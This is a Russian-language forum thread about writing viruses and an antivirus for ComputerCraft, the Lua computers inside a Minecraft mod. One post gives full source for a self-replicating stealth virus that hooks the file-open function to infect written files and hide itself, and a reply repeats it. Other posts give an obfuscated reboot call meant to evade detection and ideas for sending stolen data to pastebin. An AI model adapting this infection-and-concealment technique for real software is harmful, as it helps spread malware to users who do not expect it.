NEO 542 Опубликовано: 7 августа, 2014 я предлагаю написать антивирус , который будет сканировать содержимое дисков или внешних источников данных. работать,он будет как parser для него будет создан файл в котором будут написаны структуры кода,которые наносят вред компьютеру,parser будет подставлять эти структуры и определять есть ли этот файл вирус или нет,если да то он будет удалять его с диска , а если он попал на компьютер ,то и на компьютере. файл со структурами кода можно будет обновлять и не надо будет постоянно переписывать parser. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Zer0Galaxy 2 187 Опубликовано: 8 августа, 2014 Для начала давайте напишем вирус 6 Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Alex 4 683 Опубликовано: 10 августа, 2014 Для начала давайте напишем вирус 2 Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Grom2517 0 Опубликовано: 2 ноября, 2014 В принципе все оч. просто, только подскажи строчку по которой компьютер должен перезагрузиться/включиться (пользуюсь CC) Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
NEO Автор темы 542 Опубликовано: 2 ноября, 2014 os.reboot() перезагрузка , os.shutdown() выключение. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Гость Operarus Опубликовано: 4 ноября, 2014 Я думаю ваш парсер не сможет определять такой код: local temp = "o" temp = os["re".."b"..temp..temp.."ot"] temp()Для тех кто не понял он перезагружает компьютер.А ведь написать такой криптор много легче. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Zer0Galaxy 2 187 Опубликовано: 5 ноября, 2014 А почему вы решили, что любая программа, которая делает reboot или shutdown непременно вирус? А почему вирус непременно должен выполнять reboot или shutdown? Думаю, что парсер если и должен искать вирус, то какой то конкретный с известным кодом вирус, а не гипотетический вредоносный код. Вот почему я и предложил: для начала давайте напишем вирус. Между прочим, совершенно серьезно. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
NEO Автор темы 542 Опубликовано: 5 ноября, 2014 ну да. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
NEO Автор темы 542 Опубликовано: 5 ноября, 2014 Я думаю ваш парсер не сможет определять такой код: local temp = "o" temp = os["re".."b"..temp..temp.."ot"] temp()Для тех кто не понял он перезагружает компьютер.А ведь написать такой криптор много легче. всё можно найти.Вот с помощью флагов нее и string.gmatch(), можно находить и не такие коды. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
NEO Автор темы 542 Опубликовано: 5 ноября, 2014 этот парсер,очень примитивен,но не требует много ресурсов компьютера,можно сделать парсер ,который будет lua-шный код обрабатывать,разбивать на лексемы,строить логические деревья,и находить среди них вредоносный код. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Гость Operarus Опубликовано: 5 ноября, 2014 Я только не пойму как антивирус будет отличать вирус от не вируса, ведь если вы выложите этот антивирус в сеть, то любой сможет тестировать свой вирус на нём и когда он этим вирусом заразит все компьютеры будет уже поздно пополнять базы сигнатур. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Zer0Galaxy 2 187 Опубликовано: 5 ноября, 2014 Не знаю, кто как, но я не преследую цель заразить чей то компьютер или очистить от вируса. Для меня написание вируса и антивируса к нему это просто интересная задачка по программированию. Поэтому, давай отбросим практический интерес и придумаем код, который мог бы самораспространяться (вирус), и лекарство для него. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
DUIIIES 284 Опубликовано: 5 ноября, 2014 Ну как учтиво заметили в группе ВК, реднет сети слабовато распространены, чтобы вирус мог свободно гулять по компам, а так ведь с использованием КрафтНета можно спокойно летать по всей зоне покрытия и выгружать инфу с компов на пастбин, заливать на компы вредоносный софт, это-то вроде как не очень уж и сложно. Вся проблема в автоматизации процесса распростронения. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
NEO Автор темы 542 Опубликовано: 5 ноября, 2014 Я только не пойму как антивирус будет отличать вирус от не вируса, ведь если вы выложите этот антивирус в сеть, то любой сможет тестировать свой вирус на нём и когда он этим вирусом заразит все компьютеры будет уже поздно пополнять базы сигнатур.тогда извиняй ,тебе не понять. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Zer0Galaxy 2 187 Опубликовано: 16 декабря, 2014 (изменено) Кто хотел СС-вирус? Получите! Внимание! Запуск нижеприведенного кода приведет к заражению компьютера!Автор не несет ответственности за потерю информации в результате действия вируса! -- Zer0Virus local body=[[ local nativeopen=fs.open local VirBody=... fs.open=function(path, mode) local file=nativeopen(path, mode) if file then if mode=='r' then if file.readLine()=='-- Zer0Virus' then for i=1,19 do file.readLine() end else file=nativeopen(path, mode) end elseif mode=='w' then file.writeLine('-- Zer0Virus') file.writeLine('local body='..string.char(91,91)) file.write(VirBody) file.writeLine(string.char(93,93).." loadstring(body,'Zer0Virus')(body)") file.flush() end end return file end]] loadstring(body,'Zer0Virus')(body) print('This program is infected!') Что делает вирус?1) При первом запуске зараженной программы остается в ОЗУ компьютера т.е. заражает его.2) После заражения компьютера прописывает собственный код во все вновь создаваемые и редактируемые файлы.3) Скрывает свое тело. Т.е. при открытии зараженного файла на зараженном компьютере вы увидите содержимое не зараженного файла.Чего вирус не делает?1) Автоматически не заражает файл startup. Т.е если startup не заражен, после перезагрузки компьютер остается чистым.2) Не заражает копируемые и перемещаемые файлы.Для проверки работы вируса сохраните код под спойлером в файл с именем virus. Запустите его. Откройте файл virus на редактирование. Если Вы увидели только строчку print('This program is infected!') поздравляю, Ваш компьютер заражен.Создайте или отредактируйте в редакторе edit какой нибудь другой файл. Только не startup !!!Перегрузите компьютер и вновь откройте созданный файл. Вы должны увидеть в нем код вируса. Изменено 17 декабря, 2014 пользователем Zer0Galaxy 5 Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
GravityFolls 21 Опубликовано: 16 декабря, 2014 Кто хотел СС-вирус? Получите! Внимание! Запуск нижеприведенного кода приведет к заражению компьютера! Автор не несет ответственности за потерю информации в результате действия вируса! -- Zer0Virus local body=[[ local nativeopen=fs.open local VirBody=... fs.open=function(path, mode) local file=nativeopen(path, mode) if file then if mode=='r' then if file.readLine()=='-- Zer0Virus' then for i=1,19 do file.readLine() end else file=nativeopen(path, mode) end elseif mode=='w' then file.writeLine('-- Zer0Virus') file.writeLine('local body='..string.char(91,91)) file.write(VirBody) file.writeLine(string.char(93,93).." loadstring(body,'Zer0Virus')(body)") file.flush() end end return file end]] loadstring(body,'Zer0Virus')(body) print('This program are infected!') Что делает вирус? 1) При первом запуске зараженной программы остается в ОЗУ компьютера т.е. заражает его. 2) После заражения компьютера прописывает собственный код во все вновь создаваемые и редактируемые файлы. 3) Скрывает свое тело. Т.е. при открытии зараженного файла на зараженном компьютере вы увидите содержимое не зараженного файла. Чего вирус не делает? 1) Автоматически не заражает файл startup. Т.е если startup не заражен, после перезагрузки компьютер остается чистым. 2) Не заражает копируемые и перемещаемые файлы. Для проверки работы вируса сохраните код под спойлером в файл с именем virus. Запустите его. Откройте файл virus на редактирование. Если Вы увидели только строчку print('This program are infected!') поздравляю, Ваш компьютер заражен. Создайте или отредактируйте в редакторе edit какой нибудь другой файл. Только не startup !!! Перегрузите компьютер и вновь откройте созданный файл. Вы должны увидеть в нем код вируса. Видел в одном компе такой вирус, наверно у кого то такое мышление как и у тебя), нуу... Или всё же это ты Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Zer0Galaxy 2 187 Опубликовано: 16 декабря, 2014 Нет, не я. Этот вирус я только сегодня написал Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
DUIIIES 284 Опубликовано: 16 декабря, 2014 Кто хотел СС-вирус? Получите! Если я правильно понял, то до ручного запуска программы будет виден истинный код, а значит шанс того, что вирус будет активирован крайне мал, что печально, ну а в целом прикольная реализация) Можно было бы в принципе еще и со стартапом покурить, чтобы при перезагрузке вирус сам скачивался и после рестарта запускался... Хм, интересно в общем, очень интересно) Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Zer0Galaxy 2 187 Опубликовано: 17 декабря, 2014 Я нарочно не делал вирус слишком уж эффективным. Кто то хотел писать антивирус? Можно попробовать написать антивир для этого вируса. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Syabro 81 Опубликовано: 21 февраля, 2015 я предлагаю написать антивирус , который будет сканировать содержимое дисков или внешних источников данных. работать,он будет как parser для него будет создан файл в котором будут написаны структуры кода,которые наносят вред компьютеру,parser будет подставлять эти структуры и определять есть ли этот файл вирус или нет,если да то он будет удалять его с диска , а если он попал на компьютер ,то и на компьютере. файл со структурами кода можно будет обновлять и не надо будет постоянно переписывать parser. Если при вставке дискеты запускается файлик startup то никакой антивирус не поможет Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах